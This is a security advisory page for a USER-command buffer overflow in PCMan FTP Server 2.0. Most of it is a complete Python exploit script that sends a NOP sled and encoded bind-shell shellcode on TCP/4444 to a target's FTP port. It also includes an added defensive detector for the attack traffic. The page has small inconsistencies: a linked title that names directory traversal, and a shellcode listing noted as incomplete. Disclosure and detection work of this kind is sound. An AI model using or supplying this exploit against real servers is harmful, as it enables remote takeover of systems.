Release date:
Updated on: 2013-07-02
Affected Systems:
PCMan FTP Server 2.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60837
PCMan FTP Server is FTP server software.
PCMan FTP Server 2.0 contains a buffer overflow in its handling of the USER command (see the test method below) that allows remote attackers to execute arbitrary code in the context of the affected application.
Source: Jacob Holcomb
Link: http://packetstormsecurity.com/files/122173/PCMans-FTP-Server-2.0-Directory-Traversal.html
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
#!/usr/bin/env python
# Python 2 script (print statements, raw_input), as published in the advisory.
import signal
from time import sleep
from socket import *
from sys import exit, exc_info


def sigHandle(signum, frm):  # Signal handler for ctrl+c
    print "\n[!] Cleaning up the exploit... [!]\n"
    sleep(1)
    exit(0)


def targServer():
    # Prompt until a syntactically valid IPv4 address is entered
    while True:
        try:
            server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the PCMan FTP Server:\n> "))
            server = inet_ntoa(server)
            break
        except:
            print "\n[!] Error: Please enter a valid IPv4 address. [!]\n"
            sleep(1)
            continue
    return server


def main():
    print ("""
[*] Title ************************** PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
[*] Discovered and Reported ***** June 2013
[*] Discovered/Exploited By ****** Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
[*] Exploit/Advisory ************** http://infosec42.blogspot.com/
[*] Software ********************** PCMan FTP Server v2.0.7 (Listens on TCP/21)
[*] Tested Commands *************** USER (Other commands were not tested and may be vulnerable)
[*] CVE ************************** PCMan FTP Server v2.0.7 Buffer Overflow: Pending
""")

    signal.signal(signal.SIGINT, sigHandle)  # Setting signal handler for ctrl+c

    victim = targServer()
    port = int(21)
    cmd = "USER"  # Vulnerable command
    junk = "\x42" * 2004  # Filler up to the saved return address
    # KERNEL32.dll 7CA58265 - JMP ESP
    ret = "\x65\x82\xA5\x7C"
    NOP = "\x90" * 50
    # 348 Bytes Bind Shell Port TCP/4444
    # msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R |
    # msfencode -e x86/shikata_ga_nai -c 1 -b "\x0d\x0a\x00\xf1" R
    # Note: two lines of the listing as reproduced here are shorter than the
    # others, so the byte count does not reach the stated 348.
    shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
    shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
    shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
    shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
    shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
    shellcode += "\x3d\x09\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
    shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
    shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80"
    shellcode += "\x54\x99\xfe\xd6\x56\x52\xcb\xef\x31\xfb\x4d\x98"
    shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7"
    shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0"
    shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82"
    shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0"
    shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6"
    shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d"
    shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32"
    shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90"
    shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5"
    shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71"
    shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2"
    shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f"
    shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14"
    shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec"
    shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88"
    shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79"

    sploit = cmd + junk + ret + NOP + shellcode
    # Pad the request to a fixed total length, then terminate the FTP command line
    sploit += "\x42" * (2992 - len(NOP + shellcode)) + "\r\n"

    try:
        print "\n[*] Creating network socket."
        net_sock = socket(AF_INET, SOCK_STREAM)
    except:
        print "\n[!] There was an error creating the network socket. [!]\n%s\n" % (exc_info(),)
        sleep(1)
        exit(0)

    try:
        print "[*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port)
        net_sock.connect((victim, port))
    except:
        print "\n[!] There was an error connecting to %s. [!]\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)

    try:
        print """[*] Attempting to exploit the ftp user command.
[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
[*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
        net_sock.send(sploit)
        sleep(1)
    except:
        print "\n[!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!]\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)

    try:
        print """[*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl+c repeatedly to force exploit cleanup.\n"""
        net_sock.close()
    except:
        print "\n[!] There was an error closing the network socket. [!]\n%s\n" % (exc_info(),)
        sleep(1)
        exit(0)


if __name__ == "__main__":
    main()
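Added example (not part of the advisory or of the exploit author's code): a defender-side check for the traffic shape this exploit produces on the FTP control channel, namely a USER command whose argument is thousands of bytes long, non-printable, and padded with a NOP sled. It assumes a 64-byte ceiling for a legitimate username and works on constructed sample sessions, not captured traffic.

```python
import re

# Constructed sample control streams (not captured traffic).
BENIGN_SESSION = b"USER alice\r\nPASS hunter2\r\nPWD\r\nQUIT\r\n"
# Same shape as the advisory's payload: the verb runs straight into ~2004
# filler bytes, then a NOP sled; shellcode and return address omitted here.
SUSPECT_SESSION = b"USER" + b"B" * 2004 + b"\x90" * 50 + b"\r\n"

MAX_USER_LEN = 64  # assumed ceiling for a legitimate username; tune per site
PRINTABLE = re.compile(rb"^[\x20-\x7e]*$")


def parse_ftp_commands(stream):
    """Split a CRLF-delimited control stream into (verb, argument) pairs.
    RFC 959 verbs are at most 4 letters; a longer first token (the exploit
    glues 'USER' to its filler with no space) is split after 4 characters,
    which is how a lenient server must be parsing it for the exploit to work."""
    cmds = []
    for line in stream.split(b"\r\n"):
        if not line:
            continue
        verb, _, arg = line.partition(b" ")
        if len(verb) > 4:
            verb, arg = verb[:4], verb[4:] + (b" " + arg if arg else b"")
        cmds.append((verb.upper(), arg))
    return cmds


def inspect_command(verb, arg):
    """Return the reasons a USER command looks like this overflow (empty if benign)."""
    reasons = []
    if verb != b"USER":
        return reasons
    if len(arg) > MAX_USER_LEN:
        reasons.append("oversized: %d bytes" % len(arg))
    if not PRINTABLE.match(arg):
        reasons.append("non-printable bytes in username")
    if arg.count(b"\x90") >= 16:  # a long run of x86 NOPs is a classic sled marker
        reasons.append("NOP sled present")
    return reasons


def scan_stream(stream):
    """Return [(verb, reasons)] for every suspicious command in the stream."""
    hits = []
    for verb, arg in parse_ftp_commands(stream):
        reasons = inspect_command(verb, arg)
        if reasons:
            hits.append((verb, reasons))
    return hits
```

The same checks can be applied to FTP server logs that record the raw USER argument, or as an IDS rule on port 21 traffic; the length ceiling is the part that needs tuning.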
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
PCMan
-----
Currently, the vendor does not provide a patch or upgrade. We recommend that users of the software follow the vendor's homepage to obtain the latest version:
https://files.secureserver.net/1sMltFOsytirTG